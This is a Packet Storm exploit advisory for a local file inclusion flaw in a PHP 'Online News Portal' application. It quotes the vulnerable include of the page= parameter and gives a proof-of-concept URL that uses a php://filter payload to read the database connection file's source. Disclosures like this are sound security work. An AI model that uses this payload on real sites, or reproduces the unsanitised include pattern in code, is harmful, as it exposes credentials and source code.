what you don't know can hurt you

Online News Portal Local File Inclusion

Online News Portal Local File Inclusion
Posted Nov 17, 2020
Authored by gh1mau

Online News Portal versions released prior to November 16, 2020 have been identified as being susceptible to a local file inclusion vulnerability.

tags | exploit, local, file inclusion
MD5 | 150d4a01deee247d05bff4f6b2ff5485

Online News Portal Local File Inclusion

Change Mirror Download
# Exploit Title: Online News Portal  - Local File Inclusion
# Date: 2020-11-16
# Exploit Author: gh1mau
# Email: gh1mau.rulez@gmail.com
# Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://www.sourcecodester.com/php/14600/online-news-portal-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14600&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code
# Software Release Data: November 16, 2020
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)

Vulnerable File:
----------------
/index.php

Vulnerable Code:
-----------------
Entry point:
line 26: $page = isset($_GET['page']) ? $_GET['page'] : 'home';

Exit point:
line 27: include $page.'.php';

Vulnerable Issue:
-----------------
Attacker could load and read any file from the application (page= parameter from index.php) (with .php extension) and decode the base64 response to read the source code.

POC:
----
http://localhost/news_portal/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect



Login or Register to add favorites

File Archive:

April 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    17 Files
  • 2
    Apr 2nd
    2 Files
  • 3
    Apr 3rd
    2 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    15 Files
  • 7
    Apr 7th
    20 Files
  • 8
    Apr 8th
    16 Files
  • 9
    Apr 9th
    5 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    4 Files
  • 13
    Apr 13th
    15 Files
  • 14
    Apr 14th
    27 Files
  • 15
    Apr 15th
    19 Files
  • 16
    Apr 16th
    7 Files
  • 17
    Apr 17th
    1 Files
  • 18
    Apr 18th
    1 Files
  • 19
    Apr 19th
    19 Files
  • 20
    Apr 20th
    18 Files
  • 21
    Apr 21st
    30 Files
  • 22
    Apr 22nd
    18 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close